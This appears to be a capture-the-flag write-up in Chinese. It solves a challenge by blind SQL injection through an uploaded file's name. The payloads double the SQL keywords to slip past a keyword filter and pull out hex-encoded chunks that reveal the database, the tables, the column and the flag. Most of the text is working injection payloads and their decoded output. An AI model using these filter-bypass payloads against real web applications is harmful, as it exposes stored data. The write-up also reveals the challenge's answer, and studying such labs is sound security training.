先注册用户
PS: 不是文件上传,在文件名处 是sql注入
filename处注入
同时输入数字,字母显示数字
sql'+123+'.jpg
刷新显示
123
爆数据库
'+(selselectect CONV(substr(hex(dAtaBase()),1,12),16,10))+'.jpg
31277325825392==> 7765625f7570=> web_up
1819238756 ==> 6c6f6164 ->load
拼接以后 web_upload
爆表:
sql'+(selselectect CONV(substr(hex((selecselectt group_concat(table_name) frofromm information_schema.tables where table_schema='web_upload')),1,12),16,10))+'.jpg
sql'+(selselectect CONV(substr(hex((selecselectt group_concat(table_name) frofromm information_schema.tables where table_schema='web_upload')),13,12),16,10))+'.jpg
sql'+(selselectect CONV(substr(hex((selecselectt group_concat(table_name) frofromm information_schema.tables where table_schema='web_upload')),25,12),16,10))+'.jpg
sql'+(selselectect CONV(substr(hex((selecselectt group_concat(table_name) frofromm information_schema.tables where table_schema='web_upload')),37,12),16,10))+'.jpg
112602976187180 66696c65732c files,
114784820031327 68656c6c6f5f hello_
112615676665705 666c61675f69 flag_i
126853610566245 735f68657265 s_here
48848364724837 2c6d656d6265 ,membe
29299 7273 rs
拼接以后为 files,hello_flag_is_here,members
爆列:
sql'+(selselectect CONV(substr(hex((selecselectt group_concat(column_name) frofromm information_schema.columns where table_name='hello_flag_is_here')),1,12),16,10))+'.jpg
sql'+(selselectect CONV(substr(hex((selecselectt group_concat(column_name) frofromm information_schema.columns where table_name='hello_flag_is_here')),13,12),16,10))+'.jpg
115858377367398 695f616d5f66 i_am_f
7102823 6c6167 lag
拼接以后为 i_am_flag
爆字段:
sql'+(selselectect CONV(substr(hex((selecselectt i_am_flag frofromm hello_flag_is_here)),1,12),16,10))+'.jpg
sql'+(selselectect CONV(substr(hex((selecselectt i_am_flag frofromm hello_flag_is_here)),13,12),16,10))+'.jpg
sql' (selselectect CONV(substr(hex((selecselectt i_am_flag frofromm hello_flag_is_here)),25,12),16,10)) '.jpg
36427215695199 21215f406d5f !!_@m_
92806431727430 54682e655f46 Th.e_F
560750951 216c6167 !lag
!!_@m_Th.e_F!lag
